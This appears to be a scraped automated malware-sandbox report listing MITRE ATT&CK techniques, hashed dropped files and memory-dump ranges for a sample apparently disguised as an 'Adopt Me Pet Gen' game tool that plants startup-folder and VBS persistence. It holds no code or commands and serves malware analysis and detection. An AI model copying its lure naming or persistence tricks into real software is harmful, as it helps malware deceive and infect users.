T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
8ba8fc1034d449222856ea8fa2531e28

SHA1
7570fe1788e57484c5138b6cead052fbc3366f3e

SHA256
2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

SHA512
7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
5d17a91caf6cf858ff63156f14cf969b

SHA1
af7e3f2fe9740beb6dd3e3f1e0045f8139b0b9b2

SHA256
98556e16e457172f7e14246a093698d1bd911f0fc63f0cef3e5d3e08e40e9306

SHA512
3edf4bc6d61f6e8063bc8ed939e6ab92f8e3f717209dc86de30f6e68907e33fc34da147463565a5216bce4098a197a8fed59add54bcd51a8dbcf651fab7ece5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dfc2d75a92cea22075e7c82454a810f9

SHA1
b1a58cdd3097f601bf52e1653244bfc9fb126d63

SHA256
aa72d06540f7e7f3069692b983df1fbeefb8dcc59725fb1d4887c00b47fe0e48

SHA512
08758c3870784a526d630420099033ffe26a8696f5f4c81c9c06f447bb5934c4acd12858dfed41f4bcf84e9d5ef45d200ec26899ae0e943d5f9ce0a73fd613b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e45c7a2be7b37f98e14e0e5c50b4abf7

SHA1
7de0074c7b96d908587d7f00b5a20be768a695bd

SHA256
aaa9035aafcbc48fbdb39059b599441074dadca218c95c64e40886fdc7e85a45

SHA512
2aedb0657dd50935ecfebbf578a70e696db3a2d2ea735a0e591d8a5acc3ccd88d998d8e47f6317d7aea9a20183af4f8e82709d0bc1d6ab0a21ae4c0cfd82854b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Adopt Me Pet Gen V1.bat

Filesize
605KB

MD5
4ead16ce92a230f512021f66f0bc6c82

SHA1
179cb0d6beec8f7301f388a25a6f99472e9e5290

SHA256
b5d4db22a0dedea531e6022040e90a9c216b48872f61eaf3f4b470ee8e353b7f

SHA512
1b79ba68cb07beeb1b742b5ea80a906a54216df1e460c2aba46b3b23ca33eec122850e33144b23e0bc78c034565d20a7537b4f64320ab679278f3a9d1e6ab4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\WizClient.bat

Filesize
395KB

MD5
f648a3808707ec58ae00f082ac787b6b

SHA1
55ae98650074783346b5de7e9d069b191277a297

SHA256
a567eb6b80ef0dbeda64cfdc1ed0879f4367cfaca137b5cd66b173716282f2b1

SHA512
9fe7e9203532df159a23c06d71a9e95ec7a06102e266f355fed35fd8eea4caefd8ccd8d021495269df2801b020e1399bb8bf818d98f327d4527bc3d28c609e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emmcluyz.ptk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.vbs

Filesize
124B

MD5
c24695dbe4919bb974031d3275abea79

SHA1
f2bea7301426f75e90bc2c1baf33186db7b2769b

SHA256
0e49bc92abf0ec4e64751064ecae53d5b6bc86be5f943971ba30a4642e933786

SHA512
1ec7bd3d2b8423e052c4fa587093c043e1577073685aa68d5ae76eeb172e67df01f7cdaa890000a373f28cb550b823f649c16c8ad9868b6f152e43d7dff71200

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk

Filesize
788B

MD5
7992985e66b1bc2145b2ead616d4a8cf

SHA1
b28c39597fed60fdf225f9d6b3597ee88c16b435

SHA256
2dcc2e677931c08053b5dce3e28b2a839d93486e36f4d14becdfb4b17df34768

SHA512
f7ac0b0c8ab5739985812c311b8ea9ac2a15819e22fc3fc33f00f3a6a013bfb653cb9696a45b0d656b4115a206644c39b13bc3dc715730f08b11d41158d116ed

Download Submit
C:\Users\Admin\AppData\Roaming\powershell.exe

Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
memory/1116-64-0x0000000007A90000-0x0000000007B34000-memory.dmp

Filesize
656KB

Download
memory/1116-67-0x0000000007DC0000-0x0000000007DD1000-memory.dmp

Filesize
68KB

Download
memory/1116-66-0x0000000007E40000-0x0000000007ED6000-memory.dmp

Filesize
600KB

Download
memory/1116-65-0x0000000007C30000-0x0000000007C3A000-memory.dmp

Filesize
40KB

Download
memory/1116-63-0x0000000007A70000-0x0000000007A8E000-memory.dmp

Filesize
120KB

Download
memory/1116-54-0x0000000070790000-0x00000000707DC000-memory.dmp

Filesize
304KB

Download
memory/1116-53-0x0000000007A30000-0x0000000007A64000-memory.dmp

Filesize
208KB

Download
memory/1152-139-0x00000000068F0000-0x0000000006906000-memory.dmp

Filesize
88KB

Download
memory/1932-149-0x0000000007F30000-0x0000000007F45000-memory.dmp

Filesize
84KB

Download
memory/1932-140-0x0000000070790000-0x00000000707DC000-memory.dmp

Filesize
304KB

Download
memory/2224-37-0x0000000007820000-0x0000000007828000-memory.dmp

Filesize
32KB

Download
memory/2224-9-0x00000000050A0000-0x00000000050D6000-memory.dmp

Filesize
216KB

Download
memory/2224-39-0x00000000084E0000-0x0000000008A86000-memory.dmp

Filesize
5.6MB

Download
memory/2224-38-0x0000000007860000-0x00000000078AC000-memory.dmp

Filesize
304KB

Download
memory/2224-12-0x00000000056B0000-0x00000000056D2000-memory.dmp

Filesize
136KB

Download
memory/2224-36-0x00000000077E0000-0x00000000077FA000-memory.dmp

Filesize
104KB

Download
memory/2224-11-0x00000000057C0000-0x0000000005DEA000-memory.dmp

Filesize
6.2MB

Download
memory/2224-35-0x0000000007E60000-0x00000000084DA000-memory.dmp

Filesize
6.5MB

Download
memory/2224-8-0x000000007463E000-0x000000007463F000-memory.dmp

Filesize
4KB

Download
memory/2224-33-0x00000000064A0000-0x00000000064EC000-memory.dmp

Filesize
304KB

Download
memory/2224-128-0x0000000074630000-0x0000000074DE1000-memory.dmp

Filesize
7.7MB

Download
memory/2224-32-0x0000000006470000-0x000000000648E000-memory.dmp

Filesize
120KB

Download
memory/2224-10-0x0000000074630000-0x0000000074DE1000-memory.dmp

Filesize
7.7MB

Download
memory/2324-90-0x0000000007470000-0x0000000007481000-memory.dmp

Filesize
68KB

Download
memory/2324-76-0x0000000070790000-0x00000000707DC000-memory.dmp

Filesize
304KB

Download
memory/2324-96-0x00000000074B0000-0x00000000074C5000-memory.dmp

Filesize
84KB

Download
memory/2324-97-0x00000000075C0000-0x00000000075DA000-memory.dmp

Filesize
104KB

Download
memory/2324-98-0x00000000075A0000-0x00000000075A8000-memory.dmp

Filesize
32KB

Download
memory/2324-95-0x00000000074A0000-0x00000000074AE000-memory.dmp

Filesize
56KB

Download
memory/4616-110-0x0000000070790000-0x00000000707DC000-memory.dmp

Filesize
304KB

Download
memory/4700-31-0x0000000005F80000-0x00000000062D7000-memory.dmp

Filesize
3.3MB

Download
memory/4700-14-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/4700-13-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/4700-52-0x0000000007AB0000-0x0000000007B4C000-memory.dmp

Filesize
624KB

Download
memory/4700-48-0x00000000079B0000-0x0000000007A08000-memory.dmp

Filesize
352KB

Download
memory/4700-42-0x0000000007940000-0x00000000079B2000-memory.dmp

Filesize
456KB

Download
memory/4700-41-0x0000000002C40000-0x0000000002C48000-memory.dmp

Filesize
32KB

Download
memory/4700-164-0x000000000A6E0000-0x000000000A772000-memory.dmp

Filesize
584KB

Download
memory/4700-165-0x000000000A6D0000-0x000000000A6DA000-memory.dmp

Filesize
40KB

Download
memory/4700-34-0x0000000007610000-0x0000000007656000-memory.dmp

Filesize
280KB

Download
memory/4700-170-0x000000000B1A0000-0x000000000B1AE000-memory.dmp

Filesize
56KB

Download
memory/4700-172-0x000000000B340000-0x000000000B34C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads